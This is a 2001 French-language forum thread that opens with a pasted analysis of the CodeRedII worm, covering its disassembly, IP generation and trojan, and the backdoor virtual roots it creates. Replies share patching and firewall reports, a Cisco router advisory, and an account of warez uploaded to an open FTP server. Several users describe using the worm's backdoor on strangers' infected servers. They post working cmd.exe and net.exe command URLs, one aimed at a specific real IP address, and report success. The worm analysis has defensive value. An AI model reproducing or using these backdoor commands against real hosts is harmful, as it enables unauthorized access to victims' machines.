this new worm. INSTALL THE MICROSOFT SECURITY PATCH:
http://www.microsoft.com/technet/t [...] /security/
bulletin/MS01-033.asp
 
To check if your system has been infected or not look for the existance of
the files, c:\explorer.exe or d:\explorer.exe. Also check your IIS scripts
folder and msadc folder to see if the file root.exe exists. If it does then
you have most likely been infected with this worm. Note: An older sadmin
unicode worm also would rename cmd.exe to root.exe so you could have a bit
of cross over there.
 
To download this analysis and all disassembly files then goto
http://www.eeye.com/html/advisories/coderedII.zip
 
Infection
================
 
1st infection:
 
A. The first thing the worm does is setup a jump table so that it can get to
all of its needed functions.
seg000:000001D0
 
B. The worm then proceedes to get its local IP address. This is later used
to deal with subnet masks (propagation) and to make sure that the worm does
not reinfect the local system.
seg000:000001D5
 
C. Next, the worm gets the local System Language to see if the local system
is running Chinese (Taiwanese) or Chinese (PRC).
seg000:000001F9
 
D. At this point the worm checks if we've executed before, and if so, then
the worm will procede to the propagation section. (See the propagation
section)
seg000:0000021A
 
E. Next, the worm will check to see if a CodeRedII atom has been placed
(GlobalFindAtomA). This functionality allows the worm to make sure not to
re-infect the local machine. If it sees that the atom exists then it sleeps
forever.
seg000:00000240
 
F. The worm will add a CodeRedII atom. This is to allow the worm the
functionality to check to see if a system has already been infected with the
worm.
seg000:0000027D
 
G. The worm now sets its number of threads to 300 for non-Chinese systems.
If the system is Chinese then it sets it to 600.seg000:00000286
 
H. At this point the worm spawns a thread starting back at step A. The worm
will spawn threads according to the number set from G. Each new thread will
be a propagation thread.
seg000:000002BA
 
I. This is where the worm calls the trojan functionality. You can find an
analysis of the trojan mechanism down below in the Trojan System section.
seg000:000002C4
 
K. The worm then sleeps for 1 day if the local system is not Chinese, 2 days
if it is.
seg000:000002DA
 
L. Reboot Windows.
seg000:000002E1
 
Propagation
================
 
This is used to spread the worm further.
seg000:000002EB
 
A. Setup local IP_STORAGE variable. This is used for worm propagation
functionality and to make sure not to re-infect the local system.
seg000:000002EB
 
B. Sleep for 64h miliseconds
seg000:000002F1
 
C. Get local system time.  The worm checks to see if it the year is less
than 2002 or if the month is less than 10. If the date is beyond either of
those, then the worm reboots the local system. That basically limits the
worm to 10/01 for its spreading (In a perfect world.)
seg000:000002FD
 
D. Setup SockAddr_in.  This will reference the GET_IP section.
seg000:0000031A
 
E. Setup Socket:  This performs a Socket(), stores the handle, then makes it
a non-blocking socket (this is important for speed dealing with connect()
calls)
seg000:00000337
 
F. Connect to the remote host, if it returns a connect right away, goto H.
seg000:00000357
 
The following is how the worm generates the IP address for the next host to
connect to:
 
GET_IP:                                 ; CODE XREF: sub_1C4+168 p
 
call    GET_OCTET       ; load 4th octet (this is in reverse ordwer due to
byte ordering)
mov     bh, al
call    GET_OCTET       ; get 3rd octet
mov     bl, al
shl     ebx, 10h        ; shift bx to the top of ebx
call    GET_OCTET       ; get 2nd octet
mov     bh, al
call    GET_OCTET       ; 1st
mov     bl, al
call    GEN_OCTET       ; get first octet
and     eax, 7          ; and it by 7
call    CHECK_ADDR_MASK ; ecx has eip
 
For each octet, generate a psuedo random byte between 1 and 254, next get a
random octet between 1 and 254 and mask it by 7
finally, use this last byte to gen a 1st octet.
 
most pertinent bit is CHECK_ADDR_MASK
 
this specifies the following:
dd 0FFFFFFFFh           ; 0 - addr masks
dd 0FFFFFF00h           ; 1
dd 0FFFFFF00h           ; 2
dd 0FFFFFF00h           ; 3
dd 0FFFFFF00h           ; 4
dd 0FFFF0000h           ; 5
dd 0FFFF0000h           ; 6
dd 0FFFF0000h           ; 7
 
This mask is applied to the local systems IP address, and matched to the
generated IP Address. This makes a new ip with 0,1 or 2 bytes of data with
the local ip.
 
For instace, the worm will 1/8th of the time generate a random IP not within
any ranges of the local IP Address.
1/2th of the time, it will stay within the same class A range of the local
IP Address
3/8th of the time, it will stay within the same class B range of the local
IP Address
 
Also note that if the IP the worm generates is 127.x.x.x, 224.x.x.x, or the
same as the local systems IP address then the worm will skip that IP address
and generate a new IP address to try to infect.
 
The way the worm generates IP addresses allows it to find more possible IIS
web servers quicker then the other CodeRed worms that have previously been
released. This new worm is also going to cause a lot more data to be zig
zaged across networks.
 
G. Do a select to get the handle. If no handle is returned, then goto K.
seg000:000003B6
 
H. Set socket to Blocking. This is so select isn't required after the
connect.
seg000:000003C5
 
I. Send a copy of the worm.
seg000:000003E4
 
J. Do a recv. this is not actually used anywhere.
seg000:000003FC
 
K. Close the socket and loop to A.
 
Trojan System
================
 
This portion of the worm is designed to dump root.exe (root.exe is cmd.exe)
into msadc and scripts, and create a trojan on the local drive.
 
seg000:00000804
 
A. Get System directory, this gets the native system directory (ie,
c:\winnt\system32)
seg000:00000810
 
B. Append cmd to the system directory string (c:\winnt\system32\cmd.exe)
seg000:00000828
 
C. Set drive modifier to c:
seg000:0000082D
 
D. copy cmd.exe to /scripts/root.exe (Actual path:
Drivemodifier:\inetpub\scripts\root.exe)
seg000:00000831
 
E. copy cmd.exe to /msadc/root.exe (Actual Path:
DriveModifier:\progra~1\common~1\system\MSADC\root.exe)
seg000:00000863
 
F.  Intitialize area for explorer.exe
seg000:000008A2
 
G. Create Drive/explorer.exe (drive is c, then d)
seg000:00000E83
 
H. The worm now writes out explorer.exe. There is an embedded binary within
the worm that will be written out to explorer.exe.  It has the property that
if an embedded byte is 0xFC, it geplaced by 20h 0x00 bytes instead of the
regularbyte. For more on what the trojan explorer.exe binary does then goto
the Explorer.exe Trojan section. Also the way NT works is that when a user
logs into the local system it has to load explorer.exe (desktop, task bar
etc...) however NT looks for explorer.exe first in the main drive path c:\
which means the trojan explorer.exe is going to be loaded the next time a
user logs in... therefore keeping the system trojaned over and over and
over.
seg000:00000EC8
 
I. close explorer.exe
seg000:00000ED5
 
J. Change drive modifier to D, then the worm goes back to the code in step
D. After it is done then it goes back to step k of the infection process.
seg000:00000EDD
 
Explorer.exe Trojan
================
explorer.exe quick overview:
 
1. Get local systems windows directory.
2. Execute explorer.exe from within the local systems windows directory.
3. The worm now goes into the following loop:
 
while(1)
{
set SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable to
0FFFFFF9Dh, which basically disables system file protection.
set SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\Scripts
to ,,217
set SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\msadc
to ,,217
Set SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\c to
c:\,,217
Set SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\d to
d:\,,217
sleep for 10 minutes
}
 
Basically the above code creates a virtual web path (/c and /d) which maps
/c to c:\ and /d to d:\. The writer of this worm has put in this
functionality to allow for a backdoor to be placed on the system so even if
you remove the root.exe (cmd.exe prompt) from your /scripts folder an
attacker can still use the /c and /d virtual roots to compromise your
system. The attacks would basically look like:
 
http://IpAddress/c/inetpub/scripts/root.exe?/c+dir (if root.exe was still
there) or:
http://IpAddress/c/winnt/system32/cmd.exe?/c+dir Where dir could be any
command an attacker would want to execute.
 
As long as the trojan explorer.exe is running then an attacker will be able
to remotely access your server.
-----------------------------------------------------------------
 
chiotte de produits cro$oft de merde :hot::gun:

Reply

Marsh Posté le 06-08-2001 à 10:58:04    

NinoH a écrit a écrit :

Je travaille sous Win 98.
Des risques de contamination ?  




nan, c juste pour windows 2000 server  :)

Reply

Marsh Posté le 06-08-2001 à 12:08:17    

en même temps faut voir le bon coté des choses, ce virus fonctionne avec iis et dans iis y a un serveur ftp donc quand vous recevez une alerte rien ne vous empêche d'aller laisser un petit message de mécontentement sur le disque dur de la méchante personne qui a pas patché son pc :D

Reply

Marsh Posté le 06-08-2001 à 12:17:53    

le top serait d'automatiser le processus sur les firewalls, afin de prévenir tout les ordis qui essayent de m'envoyer le ver.
 
Sinon, tu fais comment pour laisser un messages sur les ftp des postes contaminées ? faut qu'ils autorisent l'écriture ? faut utiliser une faille similaire à celle qu'a utilisé red code ?

 

[edtdd]--Message édité par chr_79--[/edtdd]

Reply

Marsh Posté le 06-08-2001 à 14:25:44    

oui il faut que l'upload soit autorisé mais ça a l'air d'être le cas sur pas mal de machines
y a surement d'autres moyens un peu plus détournés mais j'ai pas mon manuel de hacker sous la main ;)

Reply

Marsh Posté le 06-08-2001 à 14:46:00    

Surtout qu'il n'y a pas que les SRVR IIS qui s'en prennent plein la gueule ;)
 
-----------------------------------------------------------------
Any Cisco 600 series of DSL router that has not been patched per the
December 2000 Cisco Security Advisory
(http://www.cisco.com/warp/public/707/CBOS-multiple.shtml) will stop
forwarding traffic when scanned by a system infected by the "Code Red"
worm. The power must be cycled to restore normal service. Cisco offers free
software upgrades to all affected customers of the vulnerability described
in the above advisory.
 
jas
 
At 10:43 PM 8/5/01 -0400, Geo. wrote:
>All day I've had customers calling with cisco 678 routers running cbos 2.4.2
>with the web interface disabled. Seems their routers have been crashing.
>
>We traced this back to the code red worm. For some reason even with web
>disabled on these routers port 80 remains open. Simply running a port scan
>and cutting off the connection is enough to crash the router. Locks up
>solid.
>
>I also found a solution, by doing a
>
>set web remote ipaddress
>
>where ipaddress is one of their internal IP's you can prevent outside
>addresses from being able to crash the router.
>
>Just a heads up guys, if you are seeing 678's crashing, give it a try, it's
>working here.
>
>Geo.
----------------------------------------------------------------

Reply

Marsh Posté le 06-08-2001 à 15:12:17    

cool !  :lol:  
 
pour info, sur mon firewall :
le 02/08 : 6 tentatives de contamination de RED CODE 1
(le 3/08 firewall pas allumé de la journée)
le 4/08 : 14 tentatives de contamination (13 de RED CODE 2 et 1 de RED CODE 1)
le 5/08 : 35 tentatives de contamination (33 de RED CODE 2 et 2 re RED CODE 1)
le 6/08 : déja 57 tentatives de contamination et c pas fini !
 
 
 
ps : RED CODE 2 envoi le même type de requete, sauf que c'est des XXXXXXXXXXXXXXXXXXX à la place des NNNNNNNNNNNNNNNN.

 

[edtdd]--Message édité par chr_79--[/edtdd]

Reply

Marsh Posté le 06-08-2001 à 15:14:51    

Reply

Marsh Posté le 06-08-2001 à 15:21:02    

krapaud>regarde 8 posts au dessus ;)
 
chr>t'a pas vu la tronche du mien...depuis peut, il y a hissé un petit drapaud blanc qu'il n'arrête pas de secouer :D :crazy:

 

[edtdd]--Message édité par Chewbacca--[/edtdd]

Reply

Marsh Posté le 06-08-2001 à 15:22:59    

bon j ai interet a verifier tout ca et a bosser mon firewall  
parceque la j ai juste blocage de tout et rdirection sur mon win2k  avec les ip masq ftp irc et raudio

Reply

Marsh Posté le 06-08-2001 à 15:32:50    

Petite précision: RED CODE 1 s'attaque au site www.whitehouse.gov, alors que RED CODE 2 installe simplement un troyen dans votre machine.

Reply

Marsh Posté le 06-08-2001 à 15:42:59    

Je rigole aussi :)
 
 
Vu que Code Red installe une backdoor d'après ce que j'ai compris sur le disque C:, il suffit de lancer une requete sur net.exe comme si il s'agissait d'un appel CGI:
 
c:\winnt\system32\net.exe send * Ce serveur est infecte par Code Red
 
Ce qui dans un URL donnerait, qqch du genre :
http://ipaddress/c/winnt/system32/net.exe?send+*+Ce+serveur+est+infecte+par+Code+Red
 
 
Ca devrait balancer le message sur l'ensemble du domaine du type... ca pourrait être fun ;)
 
Pour la version sans backdoor il serait possible d'utiliser la même vulnérabilité que le worm pour envoyer le net send...

 

[edtdd]--Message édité par Requin--[/edtdd]

Reply

Marsh Posté le 06-08-2001 à 15:56:32    

oui, c'est ça
 
n'essayez surtout pas par ex :
 
http://193.252.50.243/c/winnt/system32/cmd.exe?/c+dir
 
car cela constitue une violation de la vie privée, et que seul BILL GATES est autorisé à visualiser le contenu des disques dur de ses clients.
 
 
(soyez sympa, effacez pas le disque de cette malheureuse victime de red code 2.)

 

[edtdd]--Message édité par chr_79--[/edtdd]

Reply

Marsh Posté le 06-08-2001 à 16:01:23    

net send à l'air de fonctionner :D
 
Evidemment comme il ne retourne rien comme code HTML le serveur Web envoie une erreur.

 

[edtdd]--Message édité par Requin--[/edtdd]

Reply

Marsh Posté le 06-08-2001 à 16:29:56    

Notez que dans les prochains jour, les attaques exploitant la présence du ver red code 2 vont devenir de plus en plus fréquentes.
 
Ceux qui disposent de connexion très rapide vont gentiment preter sans le savoir leur bande passante et heberger gratuitement beaucoup de prog Warez, et ce sans le savoir ...  :sarcastic:

 

[edtdd]--Message édité par chr_79--[/edtdd]

Reply

Marsh Posté le 06-08-2001 à 16:32:40    

lol :D
c clair !

Reply

Marsh Posté le 06-08-2001 à 16:55:37    

avec apache y a aucun probleme?

Reply

Marsh Posté le 06-08-2001 à 16:56:29    

non car c'est pas fait par bill et cie

Reply

Marsh Posté le 06-08-2001 à 17:29:07    

chr_79 a écrit a écrit :

 
Ceux qui disposent de connexion très rapide vont gentiment preter sans le savoir leur bande passante et heberger gratuitement beaucoup de prog Warez, et ce sans le savoir ...  :sarcastic:  




 
C'est deja le cas grace aux faiblesses du protocole FTP.
Et a l'ignorance des admins reseaux bien sur :)
 :lol:  :lol:  :lol:

Reply

Marsh Posté le 06-08-2001 à 17:30:14    

chr_79 a écrit a écrit :

 
Ceux qui disposent de connexion très rapide vont gentiment preter sans le savoir leur bande passante et heberger gratuitement beaucoup de prog Warez, et ce sans le savoir ...  :sarcastic:  




 
C'est deja le cas grace aux faiblesses du protocole FTP.
Et a l'ignorance des admins reseaux bien sur :)
 :lol:  :lol:  :lol:

Reply

Marsh Posté le 06-08-2001 à 17:32:51    

Ouaip, dans une école universitaire il y avait un FTP anonyme avec 4 Go d'espace libre (upload autorisé) en environ 10 heures d'attaque ils ont pris 4 Go de Warez en upload et 56 Go en download.

Reply

Marsh Posté le 06-08-2001 à 18:29:13    

Fait iech, aujourd'hui plus de connectivité internet au boulot, obligé de jouer toute la journée a UrbanTerror... C'est dur!

Reply

Marsh Posté le 07-08-2001 à 01:41:34    

le patch microsoft suffit il?

Reply

Marsh Posté le 07-08-2001 à 02:06:10    

Ben moi je peut pas l' installer  
 
Je suis sous XP donc pasde patch même celui de 2000 marche pas

Reply

Marsh Posté le 07-08-2001 à 12:18:29    

pour xp
 
le probleme n'est ke dans les version beta
 
corrige a partir de la rc 1

Reply

Marsh Posté le 07-08-2001 à 12:53:31    

Je me suis amusé à faire des stats sur les accès au port 80 sur mon ordi (connecté 24/24h ces derniers jours)... voilà le nombre d'accés par jour (tout d'abord):
 
3 Aug 2001      8
4 Aug 2001      34
5 Aug 2001      158
6 Aug 2001      179
7 Aug 2001      149
 
on voit très nettement une augmentation assez rapide, surtout que pour le 7 ce n'est pas encore fini (il n'est que 12H45) et en faisant des stats par heure j'avais les maximums entre 14h00 et 21h00 (genre qu'1 seul acces par heure avant 14H00 et hop tout d'un coup 10-20/h acces jusqu'a 21-22h)
 
Sachant qu'il y a en moyenne un peu plus de 2 acces par ip, je trouve cette évolution inquiétante...
 
--  
Tentacle

Reply

Marsh Posté le 07-08-2001 à 13:59:57    

... et ça augmente vite là... :/

Reply

Marsh Posté le    

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed